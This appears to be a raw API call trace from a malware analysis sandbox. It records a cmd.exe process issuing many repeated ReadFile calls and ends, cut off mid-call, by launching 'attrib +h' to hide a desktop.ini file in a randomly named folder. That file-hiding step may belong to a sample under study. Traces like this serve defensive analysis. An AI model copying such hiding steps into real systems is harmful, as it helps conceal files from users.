(in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.769] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.769] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.769] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.769] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.769] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.769] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.769] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.769] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.770] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.770] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.770] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.770] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.770] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.770] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.770] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.770] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.770] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.771] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.771] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.771] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.771] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.771] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.771] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.771] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.771] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.771] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.772] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.772] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.772] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.772] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.772] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.772] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.772] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.772] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.772] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.772] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.773] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.773] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.773] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.773] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.773] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.773] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.773] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.773] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.773] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.774] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.774] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.774] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.774] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.777] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.777] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.777] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.777] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.777] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.777] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.777] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.778] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.778] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.778] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.778] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.778] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.778] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.778] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.778] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.778] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.779] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.779] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.779] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.779] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.779] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.779] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.779] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.779] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.779] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.780] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.780] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.780] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.780] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.780] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.780] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.780] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.780] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.780] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.781] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.781] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.781] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.781] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.781] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.781] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.781] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.812] FindClose (in: hFindFile=0x2de6a8 | out: hFindFile=0x2de6a8) returned 1 [0227.812] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0227.813] _close (_FileHandle=3) returned 0 [0227.813] GetConsoleTitleW (in: lpConsoleTitle=0x26f328, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0227.813] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0227.813] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0227.813] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0227.814] FindClose (in: hFindFile=0x2de6a8 | out: hFindFile=0x2de6a8) returned 1 [0227.814] FindClose (in: hFindFile=0x2de6a8 | out: hFindFile=0x2de6a8) returned 1 [0227.814] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0227.814] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0227.814] GetConsoleTitleW (in: lpConsoleTitle=0x26f0bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0227.815] InitializeProcThreadAttributeList (in: lpAttributeList=0x26ef44, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f00c | out: lpAttributeList=0x26ef44, lpSize=0x26f00c) returned 1 [0227.815] UpdateProcThreadAttribute (in: lpAttributeList=0x26ef44, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f004, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26ef44, lpPreviousValue=0x0) returned 1 [0227.815] GetStartupInfoW (in: lpStartupInfo=0x26ef00 | out: lpStartupInfo=0x26ef00*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0227.815] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0227.815] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26efa0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" ", 